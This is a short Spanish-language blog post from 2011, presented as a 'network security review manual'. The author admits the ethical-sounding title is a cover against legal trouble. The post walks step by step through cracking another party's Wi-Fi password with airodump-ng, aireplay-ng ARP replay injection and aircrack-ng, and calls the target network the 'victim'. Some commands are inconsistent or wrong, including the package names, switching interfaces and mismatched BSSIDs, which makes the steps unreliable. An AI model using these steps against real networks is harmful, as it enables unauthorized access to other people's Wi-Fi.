lunes, 31 de enero de 2011

Manual para Revisar Seguridad en Redes

Bueno bueno tenia que ser un nombre etico y que no genere problemas legales, XD

El primer paso es instalar el paquete airodump, se hace con un apt-get install airodump , todo lo hace de manera automatica, una vez instalado esto , volvemos a utilizar apt-get install iwconfig, este ultimo es para poder hacer que nuestra tarjeta wifi este en modo monitor y asi facilitar el acceso de datos.

Los pasos son los siguientes :

iwconfig wlan0 mode monitor

airodump-ng wlan0

En esta segunda instruccion veremos las redes disponibles, asi que esperaremos unos segundos y tomaremos la que mayor numero de #data obtenga, esto es debido a que es la red mas "vulnerable" para entrar.

Una vez que tengamos la victima seguimos con la siguiente instruccion :

airodump-ng eth0 --bssid 00:24:A1:6D:6F:AD --channel 6 --w out

dispwifi mac del disp canal

Al tener esta instruccion lanzada, empezaremos a captar datos para agilizar el proceso lanzamos el siguiente procedimiento :

aireplay-ng --arpreplay -b 00:24:A1:6D:5B:1E -e "victima" eth0


Este segundo a mi parecer se encarga de enviarle mas "señuelos" para que se incrementen exponencialmente los #data capturados, dejen este proceso, al menos 20 minutos, 20 horas, 2 horas, el tiempo que ustedes consideren , deben capturar al menos 1 millon y algo de #data, esto para asegurar el proceso de desencriptacion. Recuerden hacer estos procesos N veces hasta asegurar el mayor numero de #data.

_Una vez terminado lanzen lo siguiente :

aircrack-ng *.cap


Y si todo fue bien les dara la contraseña en asccii , esta misma la podran usar en su admin de redes.

XD

No hay comentarios.: